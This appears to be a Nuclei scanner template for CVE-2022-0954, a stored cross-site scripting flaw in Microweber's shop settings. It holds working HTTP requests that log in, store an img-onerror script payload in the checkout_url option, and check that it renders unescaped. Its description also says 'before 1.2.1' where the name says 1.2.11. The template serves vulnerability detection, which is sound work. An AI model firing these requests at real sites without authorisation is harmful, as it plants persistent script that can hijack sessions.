64 lines
2.7 KiB
YAML
64 lines
2.7 KiB
YAML
id: CVE-2022-0954
|
|
|
|
info:
|
|
name: Microweber <1.2.11 - Stored Cross-Site Scripting
|
|
author: amit-jd
|
|
severity: medium
|
|
description: |
|
|
Microweber before 1.2.1 contains multiple stored cross-site scripting vulnerabilities in Shop's Other Settings, Autorespond E-mail Settings, and Payment Methods.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
|
|
remediation: |
|
|
Upgrade Microweber to version 1.2.11 or later to mitigate this vulnerability.
|
|
reference:
|
|
- https://github.com/advisories/GHSA-8c76-mxv5-w4g8
|
|
- https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/
|
|
- https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0954
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 5.4
|
|
cve-id: CVE-2022-0954
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00144
|
|
epss-percentile: 0.50048
|
|
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 3
|
|
vendor: microweber
|
|
product: microweber
|
|
tags: cve,cve2022,xss,microweber,huntr
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /api/user_login HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
username={{username}}&password={{password}}
|
|
- |
|
|
POST /api/save_option HTTP/2
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
Referer: {{BaseURL}}/admin/view:shop/action:options
|
|
|
|
option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother
|
|
- |
|
|
POST /module/ HTTP/2
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
Referer: {{BaseURL}}/admin/view:shop/action:options
|
|
|
|
module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body_2,"true")'
|
|
- contains(body_3,'\"><img src=\"x\" onerror=\"alert(document.domain);\">\" placeholder=\"Use default')
|
|
- 'contains(header_3,"text/html")'
|
|
- 'status_code_3==200'
|
|
condition: and
|
|
# digest: 4b0a00483046022100f47325bc42307a32f6e2e4472aed48c92bbf1db2f9ec0f10f846f2f2a6007d2a022100bf6b71c098e00a511182bad5b21462afc1419e5fe4f57c4d45ae878d1f50da82:922c64590222798bb761d5b6d8e72950 |